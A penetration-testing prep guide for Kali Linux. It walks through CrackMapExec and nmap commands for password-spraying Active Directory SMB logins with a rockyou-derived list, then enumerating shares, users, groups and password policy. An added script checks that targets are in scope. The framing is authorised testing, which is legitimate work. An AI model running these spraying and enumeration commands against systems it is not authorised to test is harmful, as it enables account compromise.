Kali Linux Prep

Prepping Kali Linux before a penetration test is crucial because it ensures the system is fully updated, properly configured, and equipped with the right tools for the engagement. Outdated software, missing dependencies, or misconfigured settings can cause tools to fail at critical moments, slowing down the assessment and reducing its effectiveness. By updating repositories, verifying tool functionality, and customizing the environment to the scope of the test, you minimize disruptions and increase efficiency. A well-prepared Kali Linux environment also helps maintain professionalism, as it demonstrates thoroughness and readiness when conducting security assessments for clients.

 

Create folders to store utilities and files

				
```bash
# Install CrackMapExec
sudo apt install crackmapexec -y

# Make a new directory at the filesystem root for Active Directory tools
sudo mkdir /ad
cd /ad
sudo mkdir hacks
sudo mkdir crackmapexec
cd crackmapexec

# Grant permissions on the newly created folders and files
# (note: 777 leaves everything under /ad world-writable)
sudo chmod -R 777 /ad

# Requires Sublime Text to be installed first (it provides the subl command)
# Paste in all the usernames from Active Directory
subl users.txt

# Prepare the wordlist
cd /usr/share/wordlists

# (Optional) View permissions for the wordlists
ls -la

# Change back to the crackmapexec directory
cd /ad/crackmapexec

# Check that your wordlist is readable
head -n 1000 /usr/share/wordlists/rockyou.txt

# Write the first 1000 entries to a new file in the crackmapexec directory
head -n 1000 /usr/share/wordlists/rockyou.txt > passwords.txt

# Run crackmapexec once so it completes its first-time setup
crackmapexec

# (Optional) Nmap the domain controller to view open ports
nmap -Pn <target ip>

# (Optional) Nmap the target workstation to view open ports
nmap -Pn <target ip>

# Use crackmapexec to get information about the machine
crackmapexec smb <target ip>

# Create a target file containing the IP of the target machine
subl /ad/crackmapexec/targets.txt

# Try a single username/password pair against the target
crackmapexec smb targets.txt -u username -p password

# Use the users.txt and passwords.txt files against the target
crackmapexec smb targets.txt -u users.txt -p passwords.txt

# (Optional) Keep testing after a valid password is found
crackmapexec smb targets.txt -u username -p password --continue-on-success

# (Optional) Keep testing after a valid password is found and show only the successful [+] lines
crackmapexec smb targets.txt -u username -p password --continue-on-success | grep '[+]'

# After a successful login, display the password policy
crackmapexec smb targets.txt -u username -p password --pass-pol

# After a successful login, display local groups
crackmapexec smb targets.txt -u username -p password --local-groups

# After a successful login, display other users
crackmapexec smb targets.txt -u username -p password --users

# After a successful login, display shares
crackmapexec smb targets.txt -u username -p password --shares
```
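
A pre-flight check for the workspace above, as an added example that is not part of the original page: it confirms the wordlist is actually readable (Kali ships rockyou.txt gzip-compressed) and that every entry in targets.txt falls inside the engagement's authorised ranges. The file scope.txt and all function names are assumptions made for this example.

```shell
# Added example, not from the original page. scope.txt is a hypothetical file
# listing the authorised CIDR ranges (one per line) from the rules of engagement.
# Print a dotted-quad IPv4 address as an integer; return 1 if it is malformed.
ip_to_int() {
    case "$1" in ""|*[!0-9.]*|*.) return 1 ;; esac
    _old=$IFS; IFS=.; set -- $1; IFS=$_old
    [ "$#" -eq 4 ] || return 1
    _n=0
    for _o in "$@"; do
        # Reject empty octets, leading zeros (read as octal) and >3 digits.
        case "$_o" in ""|0?*|????*) return 1 ;; esac
        [ "$_o" -le 255 ] || return 1
        _n=$(( ($_n << 8) | $_o ))
    done
    echo "$_n"
}

# in_cidr IP NET/BITS: succeed only if IP lies inside the range.
in_cidr() {
    _ip=$(ip_to_int "$1") || return 1
    _net=$(ip_to_int "${2%/*}") || return 1
    _bits=${2#*/}
    case "$_bits" in ""|*[!0-9]*|???*) return 1 ;; esac
    [ "$_bits" -le 32 ] || return 1
    _mask=$(( (4294967295 << (32 - $_bits)) & 4294967295 ))
    [ $(( $_ip & $_mask )) -eq $(( $_net & $_mask )) ]
}

# check_targets TARGETS SCOPE: report every target that is not a plain IPv4
# address inside an authorised range; return 0 only if all are in scope.
check_targets() {
    _bad=0
    while IFS= read -r _t || [ -n "$_t" ]; do
        case "$_t" in ""|\#*) continue ;; esac
        _ok=1
        while IFS= read -r _c || [ -n "$_c" ]; do
            if in_cidr "$_t" "$_c"; then _ok=0; break; fi
        done < "$2"
        [ "$_ok" -eq 0 ] || { echo "NOT IN SCOPE: $_t" >&2; _bad=1; }
    done < "$1"
    return "$_bad"
}

# check_wordlist FILE: 0 readable, 2 only FILE.gz present (as Kali ships it), 1 missing.
check_wordlist() {
    if [ -r "$1" ]; then return 0; fi
    if [ -r "$1.gz" ]; then echo "run: sudo gunzip $1.gz" >&2; return 2; fi
    return 1
}
```

Run `check_wordlist /usr/share/wordlists/rockyou.txt` and `check_targets /ad/crackmapexec/targets.txt /ad/crackmapexec/scope.txt` before the first scan; a non-zero status means the file needs fixing before any tool is pointed at it.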

				
			
